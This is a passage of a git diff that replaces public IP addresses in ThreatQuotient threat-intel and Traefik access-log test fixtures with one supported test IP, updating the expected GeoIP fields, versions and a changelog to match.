14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -381,19 +381,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.65.79.99", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.65.79.99" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368861583Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1919,\"indicator_id\":343,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1920,\"indicator_id\":343,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Pompano Beach\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1921,\"indicator_id\":343,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1922,\"indicator_id\":343,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1923,\"indicator_id\":343,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1924,\"indicator_id\":343,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"994a4586b27e46db67a59220ab6dd73f\",\"id\":343,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":343,\"indicator_id\":343,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.65.79.99\"}", + "ingested": "2021-12-09T13:49:13.119548800Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1919,\"indicator_id\":343,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1920,\"indicator_id\":343,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Pompano Beach\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1921,\"indicator_id\":343,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1922,\"indicator_id\":343,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1923,\"indicator_id\":343,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1924,\"indicator_id\":343,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"994a4586b27e46db67a59220ab6dd73f\",\"id\":343,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":343,\"indicator_id\":343,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -431,19 +431,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.199.22.46", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.199.22.46" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368866041Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1937,\"indicator_id\":346,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1938,\"indicator_id\":346,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1939,\"indicator_id\":346,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1940,\"indicator_id\":346,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1941,\"indicator_id\":346,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Little Elm\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1942,\"indicator_id\":346,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"40e81e10007099902cf40cfe3a8227dc\",\"id\":346,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":346,\"indicator_id\":346,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.199.22.46\"}", + "ingested": "2021-12-09T13:49:13.119554400Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1937,\"indicator_id\":346,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1938,\"indicator_id\":346,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1939,\"indicator_id\":346,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1940,\"indicator_id\":346,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1941,\"indicator_id\":346,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Little Elm\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1942,\"indicator_id\":346,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"40e81e10007099902cf40cfe3a8227dc\",\"id\":346,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":346,\"indicator_id\":346,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -481,19 +481,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.162.74.166", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.162.74.166" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368870529Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1943,\"indicator_id\":347,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1944,\"indicator_id\":347,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1945,\"indicator_id\":347,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1946,\"indicator_id\":347,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1947,\"indicator_id\":347,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Dallas\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1948,\"indicator_id\":347,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"418a88a2a1bac6980a7d83e6b2b2a27d\",\"id\":347,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":347,\"indicator_id\":347,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.162.74.166\"}", + "ingested": "2021-12-09T13:49:13.119576600Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1943,\"indicator_id\":347,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1944,\"indicator_id\":347,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1945,\"indicator_id\":347,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1946,\"indicator_id\":347,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1947,\"indicator_id\":347,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Dallas\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1948,\"indicator_id\":347,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"418a88a2a1bac6980a7d83e6b2b2a27d\",\"id\":347,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":347,\"indicator_id\":347,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" diff --git a/packages/ti_threatq/manifest.yml b/packages/ti_threatq/manifest.yml index 0537147572c..b35d005af34 100644 --- a/packages/ti_threatq/manifest.yml +++ b/packages/ti_threatq/manifest.yml @@ -1,6 +1,6 @@ name: ti_threatq title: ThreatQuotient -version: 1.0.1 +version: 1.0.2 release: ga description: This Elastic integration collects threat intelligence from ThreatQuotient type: integration diff --git a/packages/traefik/changelog.yml b/packages/traefik/changelog.yml index c012cf0d4c2..86c2da81610 100644 --- a/packages/traefik/changelog.yml +++ b/packages/traefik/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.0" changes: - description: Release traefik package for v8.0.0 diff --git a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log index a271309d214..9fb557e3ff3 100644 --- a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log +++ b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log @@ -1,7 +1,7 @@ 192.168.33.1 - - [02/Oct/2017:20:22:07 +0000] "GET /ui/favicons/favicon-16x16.png HTTP/1.1" 304 0 "http://example.com/login" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" 262 "Host-host-1" "http://172.19.0.3:5601" 2ms -85.181.35.98 - - [02/Oct/2017:20:22:08 +0000] "GET /ui/favicons/favicon.ico HTTP/1.1" 304 0 "http://example.com/login" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" 271 "Host-host1" "http://172.19.0.3:5601" 3ms -70.29.80.15 - - [28/Feb/2018:17:30:33 +0000] "GET /en/ HTTP/2.0" 200 2814 - "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1" 13 "Host-host1-com-0" "http://172.19.0.6:14008" 247ms +89.160.20.156 - - [02/Oct/2017:20:22:08 +0000] "GET /ui/favicons/favicon.ico HTTP/1.1" 304 0 "http://example.com/login" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" 271 "Host-host1" "http://172.19.0.3:5601" 3ms +89.160.20.156 - - [28/Feb/2018:17:30:33 +0000] "GET /en/ HTTP/2.0" 200 2814 - "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1" 13 "Host-host1-com-0" "http://172.19.0.6:14008" 247ms ::1 - - [29/Nov/2018:15:03:51 +0000] "GET / HTTP/1.1" 404 19 "-" "curl/7.62.0" 10 "backend not found" "/" 0ms -94.254.131.115 - - [19/Jan/2018:10:01:02 +0000] "GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1" 200 85 - "Android" 623112 "Host-api-wearerealitygames-com-2" "http://172.25.0.9:4140" 13ms -89.64.35.193 - - [19/Jan/2018:10:01:02 +0000] "GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1" 200 150 - "Android" 623114 "Host-api-wearerealitygames-com-2" "http://172.25.0.6:4140" 8ms +89.160.20.156 - - [19/Jan/2018:10:01:02 +0000] "GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1" 200 85 - "Android" 623112 "Host-api-wearerealitygames-com-2" "http://172.25.0.9:4140" 13ms +89.160.20.156 - - [19/Jan/2018:10:01:02 +0000] "GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1" 200 150 - "Android" 623114 "Host-api-wearerealitygames-com-2" "http://172.25.0.6:4140" 8ms 127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326 diff --git a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json index 92d59b259c3..17b84dc7482 100644 --- a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json +++ b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json @@ -46,7 +46,7 @@ }, "event": { "duration": 2000000, - "ingested": "2021-06-08T12:48:40.206985600Z", + "ingested": "2021-12-09T13:49:15.037421500Z", "original": "192.168.33.1 - - [02/Oct/2017:20:22:07 +0000] \"GET /ui/favicons/favicon-16x16.png HTTP/1.1\" 304 0 \"http://example.com/login\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\" 262 \"Host-host-1\" \"http://172.19.0.3:5601\" 2ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -85,24 +85,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-BE", - "city_name": "Berlin", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Land Berlin", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 13.4531, - "lat": 52.4473 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 6805, + "number": 29518, "organization": { - "name": "Telefonica Germany" + "name": "Bredband2 AB" } }, - "address": "85.181.35.98", - "ip": "85.181.35.98" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "url": { "original": "/ui/favicons/favicon.ico" @@ -119,7 +119,7 @@ }, "related": { "ip": [ - "85.181.35.98" + "89.160.20.156" ] }, "http": { @@ -137,8 +137,8 @@ }, "event": { "duration": 3000000, - "ingested": "2021-06-08T12:48:40.207010400Z", - "original": "85.181.35.98 - - [02/Oct/2017:20:22:08 +0000] \"GET /ui/favicons/favicon.ico HTTP/1.1\" 304 0 \"http://example.com/login\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\" 271 \"Host-host1\" \"http://172.19.0.3:5601\" 3ms", + "ingested": "2021-12-09T13:49:15.037430300Z", + "original": "89.160.20.156 - - [02/Oct/2017:20:22:08 +0000] \"GET /ui/favicons/favicon.ico HTTP/1.1\" 304 0 \"http://example.com/login\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\" 271 \"Host-host1\" \"http://172.19.0.3:5601\" 3ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -175,25 +175,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "CA-ON", - "city_name": "Ottawa", - "country_iso_code": "CA", - "country_name": "Canada", - "region_name": "Ontario", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -75.7518, - "lat": 45.2691 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 577, + "number": 29518, "organization": { - "name": "Bell Canada" + "name": "Bredband2 AB" } }, - "address": "70.29.80.15", - "ip": "70.29.80.15" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "url": { "original": "/en/" @@ -210,7 +210,7 @@ }, "related": { "ip": [ - "70.29.80.15" + "89.160.20.156" ] }, "http": { @@ -227,8 +227,8 @@ }, "event": { "duration": 247000000, - "ingested": "2021-06-08T12:48:40.207017Z", - "original": "70.29.80.15 - - [28/Feb/2018:17:30:33 +0000] \"GET /en/ HTTP/2.0\" 200 2814 - \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" 13 \"Host-host1-com-0\" \"http://172.19.0.6:14008\" 247ms", + "ingested": "2021-12-09T13:49:15.037436300Z", + "original": "89.160.20.156 - - [28/Feb/2018:17:30:33 +0000] \"GET /en/ HTTP/2.0\" 200 2814 - \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" 13 \"Host-host1-com-0\" \"http://172.19.0.6:14008\" 247ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -302,7 +302,7 @@ }, "event": { "duration": 0, - "ingested": "2021-06-08T12:48:40.207023400Z", + "ingested": "2021-12-09T13:49:15.037442100Z", "original": "::1 - - [29/Nov/2018:15:03:51 +0000] \"GET / HTTP/1.1\" 404 19 \"-\" \"curl/7.62.0\" 10 \"backend not found\" \"/\" 0ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -338,24 +338,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "PL-14", - "city_name": "Warsaw", - "country_iso_code": "PL", - "country_name": "Poland", - "region_name": "Mazovia", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 21.0, - "lat": 52.25 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 39603, + "number": 29518, "organization": { - "name": "Play" + "name": "Bredband2 AB" } }, - "address": "94.254.131.115", - "ip": "94.254.131.115" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "url": { "original": "/assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo" @@ -372,7 +372,7 @@ }, "related": { "ip": [ - "94.254.131.115" + "89.160.20.156" ] }, "http": { @@ -389,8 +389,8 @@ }, "event": { "duration": 13000000, - "ingested": "2021-06-08T12:48:40.207028400Z", - "original": "94.254.131.115 - - [19/Jan/2018:10:01:02 +0000] \"GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1\" 200 85 - \"Android\" 623112 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.9:4140\" 13ms", + "ingested": "2021-12-09T13:49:15.037447900Z", + "original": "89.160.20.156 - - [19/Jan/2018:10:01:02 +0000] \"GET 